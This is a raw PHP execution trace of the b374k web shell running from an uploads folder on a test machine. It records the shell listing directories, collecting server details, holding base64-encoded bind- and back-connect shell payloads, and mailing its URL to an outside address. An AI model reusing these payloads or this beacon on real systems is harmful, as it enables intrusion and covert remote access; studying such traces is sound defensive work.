3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz = ''
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j = 0
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz .= '/'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j++
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz .= 'var/'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j++
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/">var / </a>'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $i++
4 43 0 0.049602 714424 sizeof 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4 43 1 0.049629 714456
4 43 R 6
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz = ''
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j = 0
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz .= '/'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j++
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz .= 'var/'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j++
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz .= 'www/'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j++
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/www/">www / </a>'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $i++
4 44 0 0.049831 714464 sizeof 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4 44 1 0.049860 714496
4 44 R 6
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz = ''
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j = 0
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz .= '/'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j++
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz .= 'var/'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j++
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz .= 'www/'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j++
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz .= 'html/'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j++
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/www/html/">html / </a>'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $i++
4 45 0 0.050061 714512 sizeof 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4 45 1 0.050088 714544
4 45 R 6
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz = ''
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j = 0
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz .= '/'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j++
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz .= 'var/'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j++
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz .= 'www/'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j++
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz .= 'html/'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j++
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz .= 'uploads/'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j++
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/www/html/uploads/">uploads / </a>'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $i++
4 46 0 0.050320 714584 sizeof 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4 46 1 0.050348 714616
4 46 R 6
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $buff = 'Apache/2.4.52 (Ubuntu)<br />'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $buff .= 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64<br />'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $buff .= 'uid=33(www-data) gid=33(www-data) groups=33(www-data)<br />'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $buff .= 'server ip : 127.0.0.1 <span class="gaya">|</span> your ip : 127.0.0.1<br />'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $buff .= 'safemode <span class="gaya">OFF<span><br />'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $buff .= ' > <a href="?y=/"> / </a><a href="?y=/var/">var / </a><a href="?y=/var/www/">www / </a><a href="?y=/var/www/html/">html / </a><a href="?y=/var/www/html/uploads/">uploads / </a>'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $port_bind_bd_c = 'bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $port_bind_bd_pl = 'ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8='
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $back_connect = 'fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=='
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $back_connect_c = 'XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw'
4 47 0 0.050669 715096 showdir 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 2 '/var/www/html/uploads/' 'www-data $ '
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $fname = []
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $dname = []
5 48 0 0.050778 715096 function_exists 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'posix_getpwuid'
5 48 1 0.050801 715136
5 48 R TRUE
5 49 0 0.050823 715096 function_exists 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'posix_getgrgid'
5 49 1 0.050845 715136
5 49 R TRUE
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $posix = TRUE
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $user = '????:????'
5 50 0 0.050907 715096 opendir 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/'
5 50 1 0.050939 715376
5 50 R resource(7) of type (stream)
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $dh = resource(7) of type (stream)
5 51 0 0.050984 715344 readdir 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 resource(7) of type (stream)
5 51 1 0.051017 715416
5 51 R '..'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $file = '..'
5 52 0 0.051056 715376 is_dir 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '..'
5 52 1 0.051081 715424
5 52 R TRUE
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $dname[] = '..'
5 53 0 0.051119 715760 readdir 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 resource(7) of type (stream)
5 53 1 0.051141 715832
5 53 R '.'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $file = '.'
5 54 0 0.051179 715792 is_dir 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '.'
5 54 1 0.051202 715832
5 54 R TRUE
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $dname[] = '.'
5 55 0 0.051239 715792 readdir 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 resource(7) of type (stream)
5 55 1 0.051261 715872
5 55 R 'prepend.php'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $file = 'prepend.php'
5 56 0 0.051301 715832 is_dir 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'prepend.php'
5 56 1 0.051325 715880
5 56 R FALSE
5 57 0 0.051346 715840 is_file 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'prepend.php'
5 57 1 0.051369 715880
5 57 R TRUE
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $fname[] = 'prepend.php'
5 58 0 0.051407 716216 readdir 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 resource(7) of type (stream)
5 58 1 0.051429 716288
5 58 R 'data'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $file = 'data'
5 59 0 0.051467 716248 is_dir 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'data'
5 59 1 0.051491 716280
5 59 R TRUE
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $dname[] = 'data'
5 60 0 0.051528 716240 readdir 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 resource(7) of type (stream)
5 60 1 0.051551 716320
5 60 R '.htaccess'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $file = '.htaccess'
5 61 0 0.051590 716280 is_dir 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '.htaccess'
5 61 1 0.051614 716328
5 61 R FALSE
5 62 0 0.051634 716288 is_file 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '.htaccess'
5 62 1 0.051655 716328
5 62 R TRUE
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $fname[] = '.htaccess'
5 63 0 0.051693 716288 readdir 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 resource(7) of type (stream)
5 63 1 0.051715 716360
5 63 R '403.php'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $file = '403.php'
5 64 0 0.051753 716320 is_dir 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '403.php'
5 64 1 0.051777 716352
5 64 R FALSE
5 65 0 0.051797 716312 is_file 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '403.php'
5 65 1 0.051819 716352
5 65 R TRUE
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $fname[] = '403.php'
5 66 0 0.051856 716312 readdir 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 resource(7) of type (stream)
5 66 1 0.051880 716352
5 66 R FALSE
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $file = FALSE
5 67 0 0.051917 716312 closedir 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 resource(7) of type (stream)
5 67 1 0.051942 716128
5 67 R NULL
5 68 0 0.051968 716112 sort 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 [0 => 'prepend.php', 1 => '.htaccess', 2 => '403.php']
5 68 1 0.051997 716144
5 68 R TRUE
5 69 0 0.052017 716136 sort 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 [0 => '..', 1 => '.', 2 => 'data']
5 69 1 0.052042 716168
5 69 R TRUE
5 70 0 0.052062 716136 explode 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 2 '/' '/var/www/html/uploads/'
5 70 1 0.052086 716744
5 70 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $path = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
5 71 0 0.052140 716672 sizeof 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
5 71 1 0.052167 716704
5 71 R 6
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $tree = 6
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $parent = ''
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $buff = ' <form action="?y=/var/www/html/uploads/&x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tr><td>www-data $ </td><td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr> </form> <form action="?" method="get" style="margin:8px 0 0 0;"> <input type="hidden" name="y" value="/var/www/html/uploads/" /> <t'
5 72 0 0.052263 717952 error_reporting 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 0
5 72 1 0.052285 717992
5 72 R 0
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $sub = 'backdoor b374k'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $headers = 'From: k3nz0 \n'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $headers .= 'Content-Type: text/plain; charset=iso-8859-1\n'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $mes .= 'username: ????:????\n'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $mes .= 'password: \n'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $mes .= 'URL: /uploads/403.php\n'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $mes .= 'Referer: '
5 73 0 0.052441 718144 mail 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 4 'free.d0ing.1987@gmail.com' 'backdoor b374k' 'username: ????:????\npassword: \nURL: /uploads/403.php\nReferer: ' 'From: k3nz0 \nContent-Type: text/plain; charset=iso-8859-1\n'
5 73 1 0.053164 718288
5 73 R FALSE
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $i = 0
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $parent .= '/'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $i++
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $parent .= 'var/'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $i++
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $parent .= 'www/'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $i++
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $parent .= 'html/'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $i++
5 74 0 0.053344 718184 fileowner 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '.'
5 74 1 0.053371 718224
5 74 R 0
5 75 0 0.053392 718184 posix_getpwuid 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 0
5 75 1 0.053433 718984
5 75 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
5 76 0 0.053498 718952 filegroup 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '.'
5 76 1 0.053520 718992
5 76 R 0
5 77 0 0.053540 718952 posix_getgrgid 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 0
5 77 1 0.053575 719608
5 77 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
5 78 0 0.053668 719832 get_perms 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/'
6 79 0 0.053691 719832 fileperms 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/'
6 79 1 0.053717 719888
6 79 R 16895
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $mode = 16895
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms = ''
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'r'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'w'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'x'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'r'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'w'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'x'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'r'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'w'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'x'
5 78 1 0.053912 719888
5 78 R 'rwxrwxrwx'
5 80 0 0.053934 719880 filemtime 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/'
5 80 1 0.053957 719920
5 80 R 1676243119
5 81 0 0.053978 719880 date 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 2 'd-M-Y H:i' 1676243119
5 81 1 0.054060 722272
5 81 R '12-Feb-2023 18:05'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $buff .= '<tr><td><a href="?y=/var/www/html/uploads/">.</a></td><td>LINK</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rwxrwxrwx</td><td style="text-align:center;">12-Feb-2023 18:05</td><td><span id="titik1"><a href="?y=/var/www/html/uploads/&edit=/var/www/html/uploads/newfile.php">newfile</a> | <a href="javascript:tukar(\'titik1\',\'titik1_form\');">newfolder</a></span> <form action="?" method="get" id="titik1_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hid'
5 82 0 0.054132 722488 fileowner 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '..'
5 82 1 0.054157 722512
5 82 R 0
5 83 0 0.054177 722472 posix_getpwuid 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 0
5 83 1 0.054215 723272
5 83 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
5 84 0 0.054279 722472 filegroup 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '..'
5 84 1 0.054300 722512
5 84 R 0
5 85 0 0.054320 722472 posix_getgrgid 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 0
5 85 1 0.054355 723128
5 85 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
5 86 0 0.054433 722664 get_perms 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/'
6 87 0 0.054454 722664 fileperms 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/'
6 87 1 0.054479 722712
6 87 R 16895
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $mode = 16895
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms = ''
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'r'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'w'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'x'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'r'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'w'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'x'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'r'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'w'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'x'
5 86 1 0.054681 722712
5 86 R 'rwxrwxrwx'
5 88 0 0.054756 722704 filemtime 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/'
5 88 1 0.054779 722744
5 88 R 1676243119
5 89 0 0.054801 722704 date 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 2 'd-M-Y H:i' 1676243119
5 89 1 0.054853 723032
5 89 R '12-Feb-2023 18:05'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $buff .= '<tr><td><a href="?y=/var/www/html/">..</a></td><td>LINK</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rwxrwxrwx</td><td style="text-align:center;">12-Feb-2023 18:05</td><td><span id="titik2"><a href="?y=/var/www/html/uploads/&edit=/var/www/html/newfile.php">newfile</a> | <a href="javascript:tukar(\'titik2\',\'titik2_form\');">newfolder</a></span> <form action="?" method="get" id="titik2_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="y" v'
5 90 0 0.054937 722992 fileowner 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'data'
5 90 1 0.054962 723024
5 90 R 0
5 91 0 0.054983 722984 posix_getpwuid 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 0
5 91 1 0.055021 723784
5 91 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
5 92 0 0.055087 722984 filegroup 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'data'
5 92 1 0.055109 723024
5 92 R 0
5 93 0 0.055129 722984 posix_getgrgid 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 0
5 93 1 0.055163 723640
5 93 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
5 94 0 0.055240 722984 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'data'
6 95 0 0.055262 722984 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' 'data'
6 95 1 0.055285 723080
6 95 R 'data'
5 94 1 0.055307 722984
5 94 R 'data'
